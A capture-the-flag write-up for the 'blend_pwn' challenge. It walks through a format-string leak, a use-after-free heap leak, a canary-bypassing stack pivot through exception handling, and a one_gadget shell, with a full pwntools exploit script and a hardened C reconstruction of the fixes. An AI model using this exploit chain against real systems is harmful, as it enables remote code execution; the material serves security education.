hxb_blend_pwn

blend_pwn

Approach

  1. Use the format string vulnerability to leak the program's base address.

  2. Allocate two chunks, use the UAF to leak the heap address (heap), and lay out data on one of the chunks (after step 3 finishes, the program's stack pivots here and execution continues from it):

    payload0 = 0x10*b'a'+p64(bss)+p64(rdi)+p64(t+pelf.got['puts'])+p64(
    t+pelf.plt['puts'])+p64(rdi)+p64(bss)+p64(wu)+p64(leave)+p64(bss)

  3. Use the stack overflow to overwrite main's saved rbp with an address on the heap. The try/catch mechanism then jumps to the catch block in main, bypassing the canary check, and the rbp written earlier moves the stack frame onto the heap we control.

  4. Using the data laid out there, obtain the libc address and write the one_gadget address into the bss segment (at the location of name).

  5. Use the same method to pivot the stack frame onto bss and execute the one_gadget to get a shell.
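
Added example, not code from the writeup or the challenge binary: a hardened reconstruction in C of the menu handlers the chain above starts from, showing the two fixes that close its first steps (a fixed format string for "Show your name", and clearing the slot on "Delete note" so the index cannot be reused on freed memory). The note table (MAX_NOTES, NOTE_SIZE) is constructed here; the binary's real layout is not on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_NOTES 16   /* constructed table size; the binary's real layout is not on the page */
#define NOTE_SIZE 0x60
static char *notes[MAX_NOTES];

/* "Show your name": the name is a printf argument, never the format string,
 * so an input such as "%7$p" is echoed literally instead of reading the stack. */
int show_name(const char *name, char *out, size_t out_len) {
    return snprintf(out, out_len, "Current user:%s\n", name);
}

/* "New note": bounded copy into a zeroed chunk; returns the index, or -1 when full. */
int new_note(const char *content) {
    for (int i = 0; i < MAX_NOTES; i++) {
        if (notes[i] == NULL) {
            notes[i] = calloc(1, NOTE_SIZE);
            if (notes[i] == NULL) return -1;
            strncpy(notes[i], content, NOTE_SIZE - 1); /* calloc keeps the final NUL */
            return i;
        }
    }
    return -1;
}

/* "Delete note": free the chunk and clear the slot, so a later show/delete on the
 * same index can never touch freed memory (the UAF the writeup leaks the heap with). */
int delete_note(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] == NULL) return -1;
    free(notes[idx]);
    notes[idx] = NULL;
    return 0;
}

/* "Show note": returns the live note, or NULL for an empty or freed slot. */
const char *show_note(int idx) {
    if (idx < 0 || idx >= MAX_NOTES) return NULL;
    return notes[idx];
}

int main(void) {
    char line[64];
    show_name("%7$p", line, sizeof line);
    fputs(line, stdout);                          /* prints "Current user:%7$p" */
    int idx = new_note("aaa");
    delete_note(idx);
    puts(show_note(idx) ? "freed note readable" : "freed slot refused");
    return 0;
}
```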

EXP

'''
puts("\n****************************");
puts("1.Show your name");
puts("2.New note");
puts("3.Delete note");
puts("4.Show note");
puts("5.exit");
return printf("Enter your choice >")
'''

from pwn import *
from pwnlib.ui import pause

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', "-h"]

# p = process("blend_pwn")
p = remote('47.111.104.169', 57804)
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

# gdb.attach(p)

pelf = ELF("blend_pwn")


def sna():
    # menu 1: Show your name
    p.recvuntil("Enter your choice >")
    p.sendline('1')


def new(con):
    # menu 2: New note
    p.recvuntil("Enter your choice >")
    p.sendline('2')
    p.recvuntil("input note:")
    p.sendline(con)


def dlt(idx):
    # menu 3: Delete note
    p.recvuntil("Enter your choice >")
    p.sendline('3')
    p.recvuntil("index>")
    p.sendline(idx)


def sno():
    # menu 4: Show note
    p.recvuntil("Enter your choice >")
    p.sendline('4')


# step 1: the name is used as a format string; %7$p prints a code pointer,
# and subtracting its known offset 0x1266 gives the program base t
p.recvuntil("Please enter a name: ")
p.sendline('%7$p')
sna()
p.recvuntil("Current user:")
t = int(p.recvuntil('\n')[:-1].decode(), 16)-0x1266
print(hex(t))
# pause()

# addresses relative to the program base (offsets taken from the challenge binary)
bss = t+0x2020A0
rdi = t+0x13b3
rsi2 = t+0x13b1
main = t+0x1205
leave = t+0x12E6
fg = t+pelf.got['free']
wu = t+0xe22
payload0 = 0x10*b'a'+p64(bss)+p64(rdi)+p64(t+pelf.got['puts'])+p64(
t+pelf.plt['puts'])+p64(rdi)+p64(bss)+p64(wu)+p64(leave)+p64(bss)
# print(hex(rdi))
print("wu",hex(wu))
print(hex(len(payload0)))
pause()
# step 2: two notes; the first holds the data the pivoted stack will execute from
new(payload0)
new('aaa')

dlt('0')
dlt('1')

# the freed chunks are still shown, which leaks a heap pointer
sno()
p.recvuntil('index 2:')
heap = u64(p.recvn(6).ljust(8, b'\x00'))
print('heap', hex(heap))

# pause()
# step 3: overflow main's saved rbp with the heap address; the exception path
# skips the canary check and the catch in main pivots the frame onto the heap
p.recvuntil("Enter your choice >")
p.sendline('666')
# heap=0x64321
payload = p64(heap+0x20)*int(0x20/8)+p64(heap+0x20)[:-1]
p.recvuntil("Please input what you want:")
p.sendline(payload)

# step 4: puts(got['puts']) from the pivoted stack leaks libc
libc = u64(p.recvn(6).ljust(8, b'\x00'))-elf.sym['puts']
og = libc+0x4527a
print('libc',hex(libc))
print('og', hex(og))
print('fg', hex(fg))
print('bss',hex(bss))
print("leave",hex(leave))
pause()

# step 5: write the one_gadget address onto bss and pivot there the same way
payload = p64(bss)+p64(og)+0x60*b'\x00'
p.sendline(payload)


p.interactive()